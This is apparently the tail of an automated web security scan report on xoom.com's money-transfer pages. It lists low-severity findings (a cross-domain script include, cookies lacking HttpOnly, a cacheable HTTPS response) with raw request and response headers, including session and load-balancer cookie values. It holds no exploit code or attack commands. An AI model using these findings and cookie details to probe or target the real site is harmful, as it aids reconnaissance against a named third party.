HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "07e926f2b2332e30262ece2db8babf40e" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Wed, 09 Nov 2011 22:10:10 GMT Content-Length: 34003 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
7.4. https://www.xoom.com/sendmoneynow/signUp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The response dynamically includes the following script from another domain:https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net
Request
GET /sendmoneynow/signUp?intcid=home2_____signup HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:59 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:59 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0072843f6a4d9318bbd475ea664b095e2" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:10:52 GMT Content-Length: 27332 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <!-- silverpopAnalytics --> <script src="https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net" type="text/javascript"> </script>...[SNIP]...
8. Cookie without HttpOnly flag set
previous
next
There are 6 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
8.1. https://www.xoom.com/sendmoneynow/home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sendmoneynow/home HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: xab=91605982107887; BIGipServerprod-http-xoom=436274186.20480.0000
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "07e926f2b2332e30262ece2db8babf40e" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Wed, 09 Nov 2011 22:10:10 GMT Content-Length: 34003 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]...
8.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/css/ocb/page/home2.css HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Vary: Accept-Encoding Last-Modified: Tue, 08 Nov 2011 20:34:33 GMT ETag: "1573762826" Content-Type: text/css Accept-Ranges: bytes Content-Length: 18588 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ body{background:url(../../../img/ocb/home2/body-background.png) 0 0 repeat-x;}.newlayout{margin:0 auto;width:960px;}a{color:#17338F;text-decoration:none;}.xoom-header{background:none;padding-bottom:22...[SNIP]...
8.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Vary: Accept-Encoding Last-Modified: Tue, 08 Nov 2011 20:34:33 GMT ETag: "2309043439" Content-Type: text/css Accept-Ranges: bytes Content-Length: 73834 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ body,html{font:12px arial,helvetica,clean,sans-serif;color:#000;background:#FFF;padding:0;margin:0;}body,div,dl,dt,dd,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{...[SNIP]...
8.4. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/img/ocb/logo247.png HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Content-Type: image/png Accept-Ranges: bytes ETag: "2633024821" Last-Modified: Tue, 08 Nov 2011 20:34:28 GMT Content-Length: 1427 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ .PNG . ...IHDR..............c.....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE.3.E.#......d.H........l...............au.CZ....",tF....tRNS.................#].....IDATx..Z... ..........N....VJ&..L.]\,...[SNIP]...
8.5. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-core.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/js/xoom-core.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/js/xoom-core.js HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Vary: Accept-Encoding Last-Modified: Thu, 27 Oct 2011 23:43:41 GMT ETag: "1069885547" Content-Type: application/x-javascript Accept-Ranges: bytes Content-Length: 40345 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ (function($){$.extend({metadata:{defaults:{type:"class",name:"metadata",cre:/({.*})/,single:"metadata"},setType:function(type,name){this.defaults.type=type;this.defaults.name=name},get:function(elem,o...[SNIP]...
8.6. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-init.js
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/js/xoom-init.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/js/xoom-init.js HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Vary: Accept-Encoding Last-Modified: Wed, 09 Nov 2011 00:40:59 GMT ETag: "3532726711" Content-Type: application/x-javascript Accept-Ranges: bytes Content-Length: 108957 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ /*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz...[SNIP]...
9. Cacheable HTTPS response
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico
Issue description
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:Cache-control: no-store Pragma: no-cache
Request
GET /siteContent/xoom-release-7.0.4/img/ocb/favicon.ico HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKCache-Control: max-age=1209600,public Content-Type: application/octet-stream Accept-Ranges: bytes Content-Length: 3638 Date: Wed, 09 Nov 2011 22:10:11 GMT Server: lighttpd/1.4.23 ..............h...&... ..............(....... ...........@............................3...................................................................................................................[SNIP]...
Report generated by XSS.CX at Thu Nov 10 10:31:32 CST 2011.